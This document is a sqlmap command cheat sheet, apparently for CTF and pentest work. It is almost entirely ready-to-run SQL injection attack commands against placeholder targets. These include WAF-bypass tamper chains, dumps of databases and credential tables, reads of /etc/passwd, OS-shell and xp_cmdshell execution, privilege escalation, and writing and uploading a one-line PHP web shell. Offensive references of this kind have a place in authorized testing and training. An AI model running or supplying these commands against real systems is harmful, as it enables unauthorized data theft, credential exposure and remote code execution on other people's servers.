SQLMap
Basic Detection
# Basic GET parameter test
sqlmap -u "<url>?id=1"
# Specific parameter
sqlmap -u "<url>?id=1&page=2" -p id
# POST request
sqlmap -u <url> --data "id=1&submit=Submit"
# Test all parameters
sqlmap -u "<url>?id=1&user=test" --level 2
# Batch mode (auto-answer all prompts)
sqlmap -u "<url>?id=1" --batch
# Verbose output
sqlmap -u "<url>?id=1" -v 3
# Force DBMS (skip detection)
sqlmap -u "<url>?id=1" --dbms=mysql
sqlmap -u "<url>?id=1" --dbms=mssql
sqlmap -u "<url>?id=1" --dbms=postgresql
sqlmap -u "<url>?id=1" --dbms=sqlite
sqlmap -u "<url>?id=1" --dbms=oracle
Risk & Level Flags
# Level (1-5, default 1): number of tests per parameter
# Risk (1-3, default 1): risk of tests (3 = potentially destructive)
# Standard CTF/pentest
sqlmap -u "<url>?id=1" --level=3 --risk=2 --batch
# Full aggression
sqlmap -u "<url>?id=1" --level=5 --risk=3 --batch
# Conservative (avoid breaks)
sqlmap -u "<url>?id=1" --level=1 --risk=1
# Level/risk with specific DBMS
sqlmap -u "<url>?id=1" --dbms=mysql --level=3 --risk=2 --batch
GET / POST Parameter Testing
# GET parameter
sqlmap -u "<url>?id=1" -p id --batch
# POST data (form)
sqlmap -u <url> --data="username=admin&password=test" -p username --batch
# POST data with method
sqlmap -u <url> --method POST --data="id=1" --batch
# JSON POST body
sqlmap -u <url> --data='{"id":1,"name":"test"}' \
-H "Content-Type: application/json" --batch
# XML POST body
sqlmap -u <url> --data='<id>1</id>' \
-H "Content-Type: application/xml" --batch
# Multipart form data
sqlmap -u <url> --form --batch
# PUT request
sqlmap -u <url>/api/users/1 --method PUT --data='{"name":"test"}' \
-H "Content-Type: application/json" --batch
Crawling
# Crawl the site and test all forms/params
sqlmap -u <url> --crawl=3 --batch
# Crawl with depth
sqlmap -u <url> --crawl=5 --batch
# Crawl + exclude specific paths
sqlmap -u <url> --crawl=3 --exclude-regexp="logout|signout" --batch
# Crawl with forms
sqlmap -u <url> --crawl=2 --forms --batch
# Crawl scope (restrict to domain)
sqlmap -u <url> --crawl=3 --scope="<domain>" --batch
Authentication — Cookies
# Session cookie
sqlmap -u "<url>?id=1" --cookie="session=abc123" --batch
# Test the cookie parameter itself
sqlmap -u <url> --cookie="id=1; session=abc123" -p id --batch
# Multiple cookies
sqlmap -u "<url>?page=1" --cookie="auth=xyz; PHPSESSID=abc123" --batch
# Cookie from file
sqlmap -u "<url>?id=1" --load-cookies cookies.txt --batch
# Form-based login (let sqlmap handle login)
sqlmap -u <url> --data="user=<username>&pass=<password>" \
--forms --batch
# HTTP Basic auth
sqlmap -u "<url>?id=1" --auth-type=basic \
--auth-cred="<username>:<password>" --batch
# HTTP Digest auth
sqlmap -u "<url>?id=1" --auth-type=digest \
--auth-cred="<username>:<password>" --batch
# NTLM auth
sqlmap -u "<url>?id=1" --auth-type=ntlm \
--auth-cred="<domain>\\<username>:<password>" --batch
# Bearer token
sqlmap -u "<url>?id=1" \
-H "Authorization: Bearer <password>" --batch
# API key
sqlmap -u "<url>?id=1" \
-H "X-Api-Key: <password>" --batch
Database Enumeration
# List databases
sqlmap -u "<url>?id=1" --dbs --batch
# Current database
sqlmap -u "<url>?id=1" --current-db --batch
# Current user
sqlmap -u "<url>?id=1" --current-user --batch
# Check if DBA
sqlmap -u "<url>?id=1" --is-dba --batch
# List tables in database
sqlmap -u "<url>?id=1" -D <database> --tables --batch
# List columns in table
sqlmap -u "<url>?id=1" -D <database> -T <table> --columns --batch
# Dump table data
sqlmap -u "<url>?id=1" -D <database> -T <table> --dump --batch
# Dump specific columns
sqlmap -u "<url>?id=1" -D <database> -T <table> -C <username>,<password> --dump --batch
# Dump all databases
sqlmap -u "<url>?id=1" --dump-all --batch
# Search for specific column name
sqlmap -u "<url>?id=1" --search -C password --batch
# Search table name
sqlmap -u "<url>?id=1" --search -T users --batch
Blind Injection Techniques
# Boolean-based blind
sqlmap -u "<url>?id=1" --technique=B --batch
# Time-based blind
sqlmap -u "<url>?id=1" --technique=T --batch
# Error-based
sqlmap -u "<url>?id=1" --technique=E --batch
# Union-based
sqlmap -u "<url>?id=1" --technique=U --batch
# Stacked queries
sqlmap -u "<url>?id=1" --technique=S --batch
# All techniques
sqlmap -u "<url>?id=1" --technique=BEUSTQ --batch
# Time-based: increase sleep time
sqlmap -u "<url>?id=1" --technique=T --time-sec=5 --batch
# Increase timeout for slow targets
sqlmap -u "<url>?id=1" --timeout=30 --batch
Tamper Scripts
# List available tampers
sqlmap --list-tampers
# Bypass basic WAF
sqlmap -u "<url>?id=1" --tamper=space2comment --batch
# URL encode everything
sqlmap -u "<url>?id=1" --tamper=charencode --batch
# Double URL encode
sqlmap -u "<url>?id=1" --tamper=chardoubleencode --batch
# Hex encode strings
sqlmap -u "<url>?id=1" --tamper=hex2char --batch
# MySQL specific WAF bypass
sqlmap -u "<url>?id=1" --tamper=space2mysqldash,charencode --batch
# MSSQL specific
sqlmap -u "<url>?id=1" --dbms=mssql --tamper=space2comment,charencode --batch
# Common WAF bypass combo
sqlmap -u "<url>?id=1" \
--tamper=space2comment,charencode,randomcase \
--level=3 --risk=2 --batch
# Modsecurity bypass
sqlmap -u "<url>?id=1" \
--tamper=between,charencode,space2comment \
--batch
# Multiple tampers
sqlmap -u "<url>?id=1" \
--tamper=apostrophemask,apostrophenullencode,charencode \
--batch
OS Shell & Command Execution
# Attempt to get OS shell (requires stacked queries or into outfile)
sqlmap -u "<url>?id=1" --os-shell --batch
# OS command execution
sqlmap -u "<url>?id=1" --os-cmd="whoami" --batch
# Windows command
sqlmap -u "<url>?id=1" --os-cmd="ipconfig" --dbms=mssql --batch
# Upload a web shell (requires write permission to webroot)
sqlmap -u "<url>?id=1" --os-shell --web-root=/var/www/html --batch
File Read / Write
# Read a file (must have FILE privilege)
sqlmap -u "<url>?id=1" --file-read="/etc/passwd" --batch
sqlmap -u "<url>?id=1" --file-read="C:/Windows/win.ini" --batch
# Write a file (must have write privilege + INTO OUTFILE support)
sqlmap -u "<url>?id=1" \
--file-write=shell.php \
--file-dest=/var/www/html/shell.php \
--batch
# Write webshell
echo '<?php system($_GET["cmd"]); ?>' > /tmp/shell.php
sqlmap -u "<url>?id=1" \
--file-write=/tmp/shell.php \
--file-dest=/var/www/html/cmd.php \
--batch
Proxy & Output
# Route through Burp
sqlmap -u "<url>?id=1" --proxy=http://127.0.0.1:8080 --batch
# SOCKS5 proxy
sqlmap -u "<url>?id=1" --proxy=socks5://127.0.0.1:1080 --batch
# Save output to directory
sqlmap -u "<url>?id=1" --output-dir=/tmp/sqlmap_<target> --batch
# Dump CSV format
sqlmap -u "<url>?id=1" -D <database> -T <table> --dump --batch --csv-del=","
# Use request file (from Burp)
sqlmap -r request.txt --batch
sqlmap -r request.txt -p <parameter> --batch
# Threads (parallel requests)
sqlmap -u "<url>?id=1" --threads=5 --batch
# Delay between requests
sqlmap -u "<url>?id=1" --delay=1 --batch
# Random user-agent
sqlmap -u "<url>?id=1" --random-agent --batch
# Mobile user-agent
sqlmap -u "<url>?id=1" --mobile --batch
DBMS-Specific Attacks
MySQL
# MySQL full recon
sqlmap -u "<url>?id=1" --dbms=mysql --dbs --current-user --is-dba --batch
# MySQL UDF privilege escalation
sqlmap -u "<url>?id=1" --dbms=mysql --priv-esc --batch
# MySQL file read
sqlmap -u "<url>?id=1" --dbms=mysql --file-read="/etc/passwd" --batch
# MySQL dump users table
sqlmap -u "<url>?id=1" --dbms=mysql -D mysql -T user --dump --batch
# MySQL stacked queries shell
sqlmap -u "<url>?id=1" --dbms=mysql --technique=S --os-shell --batch
MSSQL
# MSSQL full recon
sqlmap -u "<url>?id=1" --dbms=mssql --dbs --current-user --is-dba --batch
# MSSQL xp_cmdshell enable + execute
sqlmap -u "<url>?id=1" --dbms=mssql --os-shell --batch
# MSSQL linked servers
sqlmap -u "<url>?id=1" --dbms=mssql \
--sql-query="SELECT name FROM sys.servers" --batch
# MSSQL dump all logins
sqlmap -u "<url>?id=1" --dbms=mssql \
-D master -T sys.sql_logins --dump --batch
# MSSQL Windows auth
sqlmap -u "<url>?id=1" --dbms=mssql --auth-type=ntlm \
--auth-cred="<domain>\\<username>:<password>" --batch
PostgreSQL
# PostgreSQL full recon
sqlmap -u "<url>?id=1" --dbms=postgresql --dbs --current-user --is-dba --batch
# PostgreSQL COPY command abuse (file write)
sqlmap -u "<url>?id=1" --dbms=postgresql --file-write=/tmp/shell.php \
--file-dest=/var/www/html/shell.php --batch
# PostgreSQL OS shell via COPY
sqlmap -u "<url>?id=1" --dbms=postgresql --os-shell --batch
# PostgreSQL dump roles
sqlmap -u "<url>?id=1" --dbms=postgresql \
--sql-query="SELECT rolname,rolpassword FROM pg_authid" --batch
SQLite
# SQLite basic dump
sqlmap -u "<url>?id=1" --dbms=sqlite --tables --batch
# SQLite dump all
sqlmap -u "<url>?id=1" --dbms=sqlite --dump-all --batch
# SQLite no current-user concept, skip DBA check
sqlmap -u "<url>?id=1" --dbms=sqlite -T users --dump --batch
Burp Request File Usage
# Save request from Burp as file (request.txt), then:
sqlmap -r request.txt --batch
# Mark injection point with asterisk in request file
# Change: id=1 -> id=1*
sqlmap -r request.txt --batch
# Specify parameter from file
sqlmap -r request.txt -p <parameter> --batch
# Full attack from request file
sqlmap -r request.txt --level=3 --risk=2 \
--dbs --random-agent --batch \
--output-dir=/tmp/sqlmap_<target>
Common One-Liners
# Quick check: is it injectable?
sqlmap -u "<url>?id=1" --batch --dbs
# CTF standard: full dump
sqlmap -u "<url>?id=1" --batch --level=3 --risk=2 \
--dbs --dump-all --random-agent
# From Burp with cookie auth
sqlmap -r request.txt --cookie="session=<password>" \
--level=3 --risk=2 --batch --dbs
# WAF bypass + full dump
sqlmap -u "<url>?id=1" \
--tamper=space2comment,charencode,randomcase \
--level=5 --risk=3 --batch --dbs --dump-all \
--random-agent --threads=3
# Time-based blind on slow target
sqlmap -u "<url>?id=1" --technique=T --time-sec=5 \
--dbms=mysql --level=3 --batch --dbs
